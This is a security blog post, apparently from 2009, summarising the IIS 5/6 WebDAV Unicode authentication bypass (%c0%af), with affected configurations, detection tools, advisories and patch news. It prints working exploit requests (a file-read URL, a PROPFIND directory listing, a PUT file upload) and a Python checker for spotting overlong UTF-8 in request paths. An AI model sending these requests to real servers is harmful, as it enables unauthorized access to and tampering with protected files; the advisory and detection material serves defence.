Now this is a classic: a few days ago Kingcope (Nicolaos Rangos) disclosed a remote authentication bypass vulnerability in the Microsoft IIS 6 WebDAV service. In the advisory Kingcope details some of the attack vectors this vulnerability enables, such as reading files within password-protected folders and directory listing of password-protected WebDAV folders. In some server configurations it is also possible to upload files to WebDAV-protected folders. The vulnerability exists because WebDAV fails to properly handle the '/' character in its overlong Unicode (UTF-8) encoding, %c0%af.
This reminds me of the good old Microsoft IIS 4/5 Unicode vulnerability, which was used to mass-own the Internet back in 2000-2001. What a fun vulnerability that was ^_^.
Microsoft has released a security advisory (971492), and the SRD team has published two posts clarifying many of the vulnerability's details:
More information about the IIS authentication bypass.
Answers to the IIS WebDAV authentication bypass questions.
Here’s a summary of the details so far:
- Microsoft IIS 5.0 (Windows Server 2000), IIS 5.1 (Windows XP) and IIS 6.0 (Windows Server 2003) are vulnerable.
- Microsoft IIS 7.0 (Windows Server 2008) is safe.
- To exploit this vulnerability, the WebDAV service must be enabled.
- WebDAV is disabled by default in IIS 6.0.
- To exploit this vulnerability, the IIS server must use IIS permissions to restrict a subfolder of content to authenticated users.
- An IIS server that does not use IIS permissions to restrict content to authenticated users is safe.
- To exploit this vulnerability, the IUSR_[MachineName] account must have file system access to the restricted content.
- An IIS server that does not grant file system access to the IUSR_[MachineName] account is safe.
- A parent folder of the private subfolder must allow anonymous access.
- The vulnerability affects websites implementing Basic, Digest, or Integrated Windows Authentication (NTLM).
- An IIS server that hosts web applications using only forms-based authentication is safe.
- If the IUSR_[MachineName] account has write access to WebDAV folders, it is possible to upload content to the web server.
- Microsoft SharePoint Server is safe.
- Microsoft Outlook Web Access (OWA) Server is safe.
Exploiting the WebDAV remote authentication bypass vulnerability
Authentication bypass of password-protected folders:
http://www.vulnerable.com/webdav%c0%af/sensitive.zip
Directory listing of password-protected folders:
PROPFIND /web%c0%afdav/ HTTP/1.1
Host: www.vulnerable.com
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>
Writing files to password-protected folders:
PUT /web%c0%afdav/foo.html HTTP/1.1
Host: www.vulnerable.com
Translate: f
Content-Length: 15
Content-Type: text/html
<h1>w00t!!</h1>
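As an added example (not from the original post, the advisory, or any of the tools listed below), here is a small Python checker a defender could run over request lines: it flags percent-encoded overlong UTF-8 sequences such as %c0%af (including the 3-byte variant that signature-evasion attempts may use), and contrasts strict UTF-8 decoding, which rejects them, with a simplified lenient decoder that turns C0 AF into a second '/'. The lenient decoder and the /webdav/ prefix check are assumptions for illustration only, not IIS's real code path, and the sample request lines are constructed.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample request lines for this demo (not taken from any real log).
SAMPLE_REQUESTS = [
    "GET /webdav%c0%af/sensitive.zip HTTP/1.1",
    "PROPFIND /web%c0%afdav/ HTTP/1.1",
    "PUT /web%c0%afdav/foo.html HTTP/1.1",
    "GET /public/index.html HTTP/1.1",
    "GET /caf%c3%a9/menu.html HTTP/1.1",     # well-formed 2-byte UTF-8: benign
    "GET /webdav%e0%80%af/x.txt HTTP/1.1",   # 3-byte overlong '/': evasion variant
]

# Percent-encoded overlong UTF-8: 2-byte forms with lead byte C0/C1, and
# 3-byte forms with lead byte E0 followed by a continuation byte below A0.
OVERLONG_RE = re.compile(r"%c[01]%[89ab][0-9a-f]|%e0%[89][0-9a-f]%[89ab][0-9a-f]", re.I)

def flag_overlong(lines):
    """Return the request lines whose path carries an overlong UTF-8 sequence."""
    return [line for line in lines if OVERLONG_RE.search(line)]

def strict_path(raw_path):
    """What an authorization check should see: percent-decode, then STRICT UTF-8
    decode. Python's decoder rejects overlong forms, so they yield None (reject
    the request) instead of silently turning into a second '/'."""
    try:
        return unquote_to_bytes(raw_path).decode("utf-8")
    except UnicodeDecodeError:
        return None

def lenient_2byte_decode(data: bytes) -> str:
    """Simplified model (an assumption for illustration, not IIS's real code path)
    of a decoder that tolerates overlong 2-byte forms: C0 AF becomes U+002F '/',
    which is exactly the ambiguity the bypass abuses."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b) if b < 0x80 else "\ufffd")
            i += 1
    return "".join(out)

def protected_by_prefix(path: str, prefix: str = "/webdav/") -> bool:
    """Prefix ACL check after collapsing repeated slashes as a filesystem would."""
    return re.sub(r"/+", "/", path).startswith(prefix)
```

The raw path "/webdav%c0%af/sensitive.zip" fails the prefix check while its leniently decoded form passes it, which is the kind of check-versus-use mismatch that strict decoding before authorization removes.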
Testing tools
- Metasploit added ms09_020_webdav_unicode_bypass.rb to detect vulnerable IIS6 WebDAV Unicode bypass folders.
- Ron wrote a script for Nmap to detect vulnerable IIS6 WebDAV servers – script http-iis-webdav-vuln.nse.
Further information
- Thierry Zoller wrote a great post covering most of the vulnerability details, updating in real time – Secdev – IIS 6 / IIS 5 / IIS 5.1+ Webdav auth bypass.
- Great writeup by Ron Bowes and Andrew Orr from SkullSecurity – WebDAV Detection, Vulnerability Checking and Exploitation.
- A video by Kingcope demonstrating the vulnerability on milw0rm – IIS WebDAV Vulnerability in Action.
- SecurityFocus advisory – BID 34993.
- US-CERT Vulnerability Note VU#787932 – VU#787932.
That’s it for now, great find by kcope indeed.
Updates:
>> Check out this blog post by Todd Manning of BreakingPoint Labs – ‘Slash’ and Burn – The IIS 6.0 WebDAV Bug – Gives interesting information about this vulnerability and IDS/IPS signature evasion techniques.
In addition, ET added an HTTP WebDAV Scanner to Metasploit – wmap_dir_webdav_unicode_bypass.rb.
From SANS ISC Diary – IIS admins, help finding WebDAV remotely using nmap.
>> From Thierry Zoller – the IIS WebDAV Unicode vulnerability also allows bypassing IP address and domain name restriction configurations. This keeps getting better and better… :-)
>> WebDAV unicode vulnerability overview by Steve Friedl – Understanding Microsoft’s KB971492 IIS5/IIS6 WebDAV Vulnerability.
>> Microsoft patched the IIS WebDAV Unicode authentication bypass vulnerability – MS09-020.
It’s about time.
In the Microsoft security advisory 971492, CVE-2009-1535 is registered for this vulnerability. Meanwhile, CVE-2009-1676 is also registered for the IIS WebDAV Unicode vulnerability.
Nice! Cool exploit.
CVEs:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1122
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1535
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1676